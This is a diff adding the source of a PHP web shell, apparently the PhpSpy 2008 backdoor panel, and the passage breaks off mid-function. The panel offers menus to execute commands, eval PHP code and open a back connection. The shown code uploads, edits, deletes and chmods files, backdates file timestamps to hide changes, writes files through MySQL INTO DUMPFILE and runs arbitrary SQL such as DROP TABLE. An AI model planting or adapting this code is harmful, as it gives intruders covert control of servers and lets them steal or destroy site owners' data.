+<script type="text/javascript">
+function CheckAll(form) {
+	for(var i=0;i<form.elements.length;i++) {
+		var e = form.elements[i];
+		if (e.name != 'chkall')
+		e.checked = form.chkall.checked;
+    }
+}
+function $(id) {
+	return document.getElementById(id);
+}
+function goaction(act){
+	$('goaction').action.value=act;
+	$('goaction').submit();
+}
+</script>
+</head>
+<body style="margin:0;table-layout:fixed; word-break:break-all">
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	<tr class="head">
+		<td><span style="float:right;"><a href="http://www.alturks.com" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> Ver: 2008</a></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
+	</tr>
+	<tr class="alt1">
+		<td><span style="float:right;">Safe Mode:<?php echo getcfg('safe_mode');?></span>
+			<a href="javascript:goaction('logout');">Logout</a> |
+			<a href="javascript:goaction('file');">File Manager</a> |
+			<a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
+			<a href="javascript:goaction('sqlfile');">MySQL Upload &amp; Download</a> |
+			<a href="javascript:goaction('shell');">Execute Command</a> |
+			<a href="javascript:goaction('phpenv');">PHP Variable</a> |
+			<a href="javascript:goaction('eval');">Eval PHP Code</a>
+			<?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
+		</td>
+	</tr>
+</table>
+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
+<?php
+
+formhead(array('name'=>'goaction'));
+makehide('action');
+formfoot();
+
+$errmsg && m($errmsg);
+
+// +&#1105;+&#1073;|#|#-++|
+!$dir && $dir = '.';
+$nowpath = getPath(SA_ROOT, $dir);
+if (substr($dir, -1) != '/') {
+	$dir = $dir.'/';
+}
+$uedir = ue($dir);
+
+if (!$action || $action == 'file') {
+
+	// +-|-|--||&#1097;+&#1038;
+	$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
+
+	// ++| -+-+
+	if ($doing == 'deldir' && $thefile) {
+		if (!file_exists($thefile)) {
+			m($thefile.' directory does not exist');
+		} else {
+			m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
+		}
+	}
+
+	// ||+&#1080;-+-+
+	elseif ($newdirname) {
+		$mkdirs = $nowpath.$newdirname;
+		if (file_exists($mkdirs)) {
+			m('Directory has already existed');
+		} else {
+			m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
+			@chmod($mkdirs,0777);
+		}
+	}
+
+	// +-|&#1083;+-+ 
+	elseif ($doupfile) {
+		m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
+	}
+
+	// #&#1088;+&#1085;+-+ 
+	elseif ($editfilename && $filecontent) {
+		$fp = @fopen($editfilename,'w');
+		m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
+		@fclose($fp);
+	}
+
+	// #&#1088;+&#1085;+-+ -&#1031;-+
+	elseif ($pfile && $newperm) {
+		if (!file_exists($pfile)) {
+			m('The original file does not exist');
+		} else {
+			$newperm = base_convert($newperm,8,10);
+			m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
+		}
+	}
+
+	// +-| 
+	elseif ($oldname && $newfilename) {
+		$nname = $nowpath.$newfilename;
+		if (file_exists($nname) || !file_exists($oldname)) {
+			m($nname.' has already existed or original file does not exist');
+		} else {
+			m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
+		}
+	}
+
+	// +|+|+-+ 
+	elseif ($sname && $tofile) {
+		if (file_exists($tofile) || !file_exists($sname)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
+		}
+	}
+
+	// +--&#1073;-#+&#1092;
+	elseif ($curfile && $tarfile) {
+		if (!@file_exists($curfile) || !@file_exists($tarfile)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			$time = @filemtime($tarfile);
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// ++|&#1080;-&#1093;-#+&#1092;
+	elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
+		if (!@file_exists($curfile)) {
+			m(basename($curfile).' does not exist');
+		} else {
+			$time = strtotime("$year-$month-$day $hour:$minute:$second");
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// |&#1028;# --++
+	elseif($doing == 'downrar') {
+		if ($dl) {
+			$dfiles='';
+			foreach ($dl as $filepath => $value) {
+				$dfiles.=$filepath.',';
+			}
+			$dfiles=substr($dfiles,0,strlen($dfiles)-1);
+			$dl=explode(',',$dfiles);
+			$zip=new PHPZip($dl);
+			$code=$zip->out;
+			header('Content-type: application/octet-stream');
+			header('Accept-Ranges: bytes');
+			header('Accept-Length: '.strlen($code));
+			header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
+			echo $code;
+			exit;
+		} else {
+			m('Please select file(s)');
+		}
+	}
+
+	// + -+++| +-+ 
+	elseif($doing == 'delfiles') {
+		if ($dl) {
+			$dfiles='';
+			$succ = $fail = 0;
+			foreach ($dl as $filepath => $value) {
+				if (@unlink($filepath)) {
+					$succ++;
+				} else {
+					$fail++;
+				}
+			}
+			m('Deleted file have finished&#1075;&#1084;choose '.count($dl).' success '.$succ.' fail '.$fail);
+		} else {
+			m('Please select file(s)');
+		}
+	}
+
+	//#++&#1118;-&#1098;#-
+	formhead(array('name'=>'createdir'));
+	makehide('newdirname');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileperm'));
+	makehide('newperm');
+	makehide('pfile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'copyfile'));
+	makehide('sname');
+	makehide('tofile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'rename'));
+	makehide('oldname');
+	makehide('newfilename');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileopform'));
+	makehide('action');
+	makehide('opfile');
+	makehide('dir');
+	formfoot();
+
+	$free = @disk_free_space($nowpath);
+	!$free && $free = 0;
+	$all = @disk_total_space($nowpath);
+	!$all && $all = 0;
+	$used = $all-$free;
+	$used_percent = @round(100/($all/$free),2);
+	p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)</h2>');
+
+?>
+<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
+  <form action="" method="post" id="godir" name="godir">
+  <tr>
+    <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
+	<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
+    <td nowrap><input class="bt" value="GO" type="submit"></td>
+  </tr>
+  </form>
+</table>
+<script type="text/javascript">
+function createdir(){
+	var newdirname;
+	newdirname = prompt('Please input the directory name:', '');
+	if (!newdirname) return;
+	$('createdir').newdirname.value=newdirname;
+	$('createdir').submit();
+}
+function fileperm(pfile){
+	var newperm;
+	newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
+	if (!newperm) return;
+	$('fileperm').newperm.value=newperm;
+	$('fileperm').pfile.value=pfile;
+	$('fileperm').submit();
+}
+function copyfile(sname){
+	var tofile;
+	tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
+	if (!tofile) return;
+	$('copyfile').tofile.value=tofile;
+	$('copyfile').sname.value=sname;
+	$('copyfile').submit();
+}
+function rename(oldname){
+	var newfilename;
+	newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
+	if (!newfilename) return;
+	$('rename').newfilename.value=newfilename;
+	$('rename').oldname.value=oldname;
+	$('rename').submit();
+}
+function dofile(doing,thefile,m){
+	if (m && !confirm(m)) {
+		return;
+	}
+	$('filelist').doing.value=doing;
+	if (thefile){
+		$('filelist').thefile.value=thefile;
+	}
+	$('filelist').submit();
+}
+function createfile(nowpath){
+	var filename;
+	filename = prompt('Please input the file name:', '');
+	if (!filename) return;
+	opfile('editfile',nowpath + filename,nowpath);
+}
+function opfile(action,opfile,dir){
+	$('fileopform').action.value=action;
+	$('fileopform').opfile.value=opfile;
+	$('fileopform').dir.value=dir;
+	$('fileopform').submit();
+}
+function godir(dir,view_writable){
+	if (view_writable) {
+		$('godir').view_writable.value=1;
+	}
+	$('godir').dir.value=dir;
+	$('godir').submit();
+}
+</script>
+  <?php
+	tbhead();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
+	p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
+	p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
+	if ($view_writable) {
+		p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
+	} else {
+		p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
+	}
+	p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
+	if (IS_WIN && IS_COM) {
+		$obj = new COM('scripting.filesystemobject');
+		if ($obj && is_object($obj)) {
+			$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
+			foreach($obj->Drives as $drive) {
+				if ($drive->DriveType == 2) {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'&#13;Free:'.sizecount($drive->FreeSpace).'&#13;Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				} else {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				}
+			}
+		}
+	}
+
+	p('</td></tr></form>');
+
+	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+    
+	//#&#1097;+|- +-++-|+-+ |--+-+
+	$dirdata=array();
+	$filedata=array();
+
+	if ($view_writable) {
+		$dirdata = GetList($nowpath);
+	} else {
+		// -+-+--#&#1101;
+		$dirs=@opendir($dir);
+		while ($file=@readdir($dirs)) {
+			$filepath=$nowpath.$file;
+			if(@is_dir($filepath)){
+				$dirdb['filename']=$file;
+				$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$dirdb['dirchmod']=getChmod($filepath);
+				$dirdb['dirperm']=getPerms($filepath);
+				$dirdb['fileowner']=getUser($filepath);
+				$dirdb['dirlink']=$nowpath;
+				$dirdb['server_link']=$filepath;
+				$dirdb['client_link']=ue($filepath);
+				$dirdata[]=$dirdb;
+			} else {
+				$filedb['filename']=$file;
+				$filedb['size']=sizecount(@filesize($filepath));
+				$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$filedb['filechmod']=getChmod($filepath);
+				$filedb['fileperm']=getPerms($filepath);
+				$filedb['fileowner']=getUser($filepath);
+				$filedb['dirlink']=$nowpath;
+				$filedb['server_link']=$filepath;
+				$filedb['client_link']=ue($filepath);
+				$filedata[]=$filedb;
+			}
+		}// while
+		unset($dirdb);
+		unset($filedb);
+		@closedir($dirs);
+	}
+	@sort($dirdata);
+	@sort($filedata);
+	$dir_i = '0';
+	foreach($dirdata as $key => $dirdb){
+		if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
+			p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
+			p('<td nowrap>'.$dirdb['mtime'].'</td>');
+			p('<td nowrap>--</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
+			p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
+			p('</tr>');
+			$dir_i++;
+		} else {
+			if($dirdb['filename']=='..') {
+				p('<tr class='.bg().'>');
+				p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
+				p('</tr>');
+			}
+		}
+	}
+
+	p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
+	p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
+	makehide('action','file');
+	makehide('thefile');
+	makehide('doing');
+	makehide('dir',$nowpath);
+	$file_i = '0';
+	foreach($filedata as $key => $filedb){
+		if($filedb['filename']!='..' && $filedb['filename']!='.') {
+			$fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
+			p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
+			p('<td nowrap>'.$filedb['mtime'].'</td>');
+			p('<td nowrap>'.$filedb['size'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
+			p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
+			p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
+			p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
+			p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
+			p('</td></tr>');
+			$file_i++;
+		}
+	}
+	p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
+	p('</form></table>');
+}// end dir
+
+elseif ($action == 'sqlfile') {
+	if($doing=="mysqlupload"){
+		$file = $_FILES['uploadfile'];
+		$filename = $file['tmp_name'];
+		if (file_exists($savepath)) {
+			m('The goal file has already existed');
+		} else {
+			if(!$filename) {
+				m('Please choose a file');
+			} else {
+				$fp=@fopen($filename,'r');
+				$contents=@fread($fp, filesize($filename));
+				@fclose($fp);
+				$contents = bin2hex($contents);
+				if(!$upname) $upname = $file['name'];
+				dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+				$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
+				m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
+			}
+		}
+	}
+?>
+<script type="text/javascript">
+function mysqlfile(doing){
+	if(!doing) return;
+	$('doing').value=doing;
+	$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
+	$('mysqlfile').dbport.value=$('dbinfo').dbport.value;
+	$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
+	$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
+	$('mysqlfile').dbname.value=$('dbinfo').dbname.value;
+	$('mysqlfile').charset.value=$('dbinfo').charset.value;
+	$('mysqlfile').submit();
+}
+</script>
+<?php
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
+	formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
+	makehide('action','sqlfile');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBName:');
+	makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
+	p('</p>');
+	formfoot();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
+	p('<h2>Upload file</h2>');
+	p('<p><b>This operation the DB user must has FILE privilege</b></p>');
+	p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
+	p('<h2>Download file</h2>');
+	p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
+	makehide('dbhost');
+	makehide('dbport');
+	makehide('dbuser');
+	makehide('dbpass');
+	makehide('dbname');
+	makehide('charset');
+	makehide('doing');
+	makehide('action','sqlfile');
+	p('</form>');
+}
+
+elseif ($action == 'sqladmin') {
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
+	if(isset($dbhost)){
+		$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
+	}
+	if(isset($dbuser)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
+	}
+	if(isset($dbpass)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
+	}
+	if(isset($dbport)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
+	}
+	if(isset($dbname)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
+	}
+	if(isset($charset)) {
+		$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
+	}
+
+	if ($doing == 'backupmysql' && $saveasfile) {
+		if (!$table) {
+			m('Please choose the table');
+		} else {
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			$table = array_flip($table);
+			$fp = @fopen($path,'w');
+			if ($fp) {
+				$result = q('SHOW tables');
+				if (!$result) p('<h2>'.mysql_error().'</h2>');
+				$mysqldata = '';
+				while ($currow = mysql_fetch_array($result)) {
+					if (isset($table[$currow[0]])) {
+						sqldumptable($currow[0], $fp);
+					}
+				}
+				fclose($fp);
+				$fileurl = str_replace(SA_ROOT,'',$path);
+				m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
+				mysql_close();
+			} else {
+				m('Backup failed');
+			}
+		}
+	}
+	if ($insert && $insertsql) {
+		$keystr = $valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			if ($val) {
+				$keystr .= $tmp.$key;
+				$valstr .= $tmp."'".addslashes($val)."'";
+				$tmp = ',';
+			}
+		}
+		if ($keystr && $valstr) {
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
+		}
+	}
+	if ($update && $insertsql && $base64) {
+		$valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			$valstr .= $tmp.$key."='".addslashes($val)."'";
+			$tmp = ',';
+		}
+		if ($valstr) {
+			$where = base64_decode($base64);
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
+		}
+	}
+	if ($doing == 'del' && $base64) {
+		$where = base64_decode($base64);
+		$delete_sql = "DELETE FROM $tablename WHERE $where";
+		dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
+	}
+
+	if ($tablename && $doing == 'drop') {
+		dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+		if (q("DROP TABLE $tablename")) {
+			m('Drop table of success');
+			$tablename = '';
+		} else {
+			m(mysql_error());
+		}
+	}
+
+	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
+
+	formhead(array('title'=>'MYSQL Manager'));
+	makehide('action','sqladmin');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
+	makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+?>
+<script type="text/javascript">
+function editrecord(action, base64, tablename){
+	if (action == 'del') {
+		if (!confirm('Is or isn\'t deletion record?')) return;
+	}
+	$('recordlist').doing.value=action;
+	$('recordlist').base64.value=base64;
+	$('recordlist').tablename.value=tablename;
+	$('recordlist').submit();
+}
+function moddbname(dbname) {
+	if(!dbname) return;
+	$('setdbname').dbname.value=dbname;
+	$('setdbname').submit();
+}
+function settable(tablename,doing,page) {
+	if(!tablename) return;
+	if (doing) {
+		$('settable').doing.value=doing;
+	}
+	if (page) {
+		$('settable').page.value=page;
+	}
+	$('settable').tablename.value=tablename;
+	$('settable').submit();
+}
+</script>
+<?php
+	//#++&#1118;+|-+
+	formhead(array('name'=>'recordlist'));
+	makehide('doing');
+	makehide('action','sqladmin');
+	makehide('base64');
+	makehide('tablename');
+	p($dbform);
+	formfoot();
+
+	//-&#1073;|&#1080;- +|+&#1090;
+	formhead(array('name'=>'setdbname'));
+	makehide('action','sqladmin');
+	p($dbform);
+	if (!$dbname) {
+		makehide('dbname');
+	}
+	formfoot();
+
+	//-&#1073;|&#1080;#&#1101;
+	formhead(array('name'=>'settable'));
+	makehide('action','sqladmin');
+	p($dbform);
+	makehide('tablename');
+	makehide('page',$page);
+	makehide('doing');
+	formfoot();
+
+	$cachetables = array();
+	$pagenum = 30;
+	$page = intval($page);
+	if($page) {
+		$start_limit = ($page - 1) * $pagenum;
+	} else {
+		$start_limit = 0;
+		$page = 1;
+	}
+	if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
+		dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		//+&#1105;+&#1073;- +|+&#1090;-+-&#1074;
+		$mysqlver = mysql_get_server_info();
+		p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
+		$highver = $mysqlver > '4.1' ? 1 : 0;
+
+		//+&#1105;+&#1073;- +|+&#1090;
+		$query = q("SHOW DATABASES");
+		$dbs = array();
+		$dbs[] = '-- Select a database --';
+		while($db = mysql_fetch_array($query)) {
+			$dbs[$db['Database']] = $db['Database'];
+		}
+		makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
+		$tabledb = array();
+		if ($dbname) {
+			p('<p>');
+			p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
+			if ($tablename) {
+				p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
+			}
+			p('</p>');
+			mysql_select_db($dbname);
+
+			$getnumsql = '';
+			$runquery = 0;
+			if ($sql_query) {
+				$runquery = 1;
+			}
+			$allowedit = 0;
+			if ($tablename && !$sql_query) {
+				$sql_query = "SELECT * FROM $tablename";
+				$getnumsql = $sql_query;
+				$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
+				$allowedit = 1;
+			}
+			p('<form action="'.$self.'" method="POST">');
+			p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
+			makehide('tablename', $tablename);
+			makehide('action','sqladmin');
+			p($dbform);
+			p('</form>');
+			if ($tablename || ($runquery && $sql_query)) {
+				if ($doing == 'structure') {
+					$result = q("SHOW COLUMNS FROM $tablename");
+					$rowdb = array();
+					while($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					p('<tr class="head">');
+					p('<td>Field</td>');
+					p('<td>Type</td>');
+					p('<td>Null</td>');
+					p('<td>Key</td>');
+					p('<td>Default</td>');
+					p('<td>Extra</td>');
+					p('</tr>');
+					foreach ($rowdb as $row) {
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td>'.$row['Field'].'</td>');
+						p('<td>'.$row['Type'].'</td>');
+						p('<td>'.$row['Null'].'&nbsp;</td>');
+						p('<td>'.$row['Key'].'&nbsp;</td>');
+						p('<td>'.$row['Default'].'&nbsp;</td>');
+						p('<td>'.$row['Extra'].'&nbsp;</td>');
+						p('</tr>');
+					}
+					tbfoot();
+				} elseif ($doing == 'insert' || $doing == 'edit') {
+					$result = q('SHOW COLUMNS FROM '.$tablename);
+					while ($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					$rs = array();
+					if ($doing == 'insert') {
+						p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
+					} else {
+						p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
+						$where = base64_decode($base64);
+						$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
+						$rs = mysql_fetch_array($result);
+					}
+					p('<form method="post" action="'.$self.'">');
+					p($dbform);
+					makehide('action','sqladmin');
+					makehide('tablename',$tablename);
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					foreach ($rowdb as $row) {
+						if ($rs[$row['Field']]) {
+							$value = htmlspecialchars($rs[$row['Field']]);
+						} else {
+							$value = '';
+						}
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
+					}
+					if ($doing == 'insert') {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
+					} else {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
+						makehide('base64', $base64);
+					}
+					p('</table></form>');
+				} else {
+					$querys = @explode(';',$sql_query);
+					foreach($querys as $num=>$query) {
+						if ($query) {
+							p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
+							switch(qy($query))
+							{
+								case 0:
+									p('<h2>Error : '.mysql_error().'</h2>');
+									break;
+								case 1:
+									if (strtolower(substr($query,0,13)) == 'select * from') {
+										$allowedit = 1;
+									}
+									if ($getnumsql) {
+										$tatol = mysql_num_rows(q($getnumsql));
+										$multipage = multi($tatol, $pagenum, $page, $tablename);
+									}
+									if (!$tablename) {
+										$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
+										$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
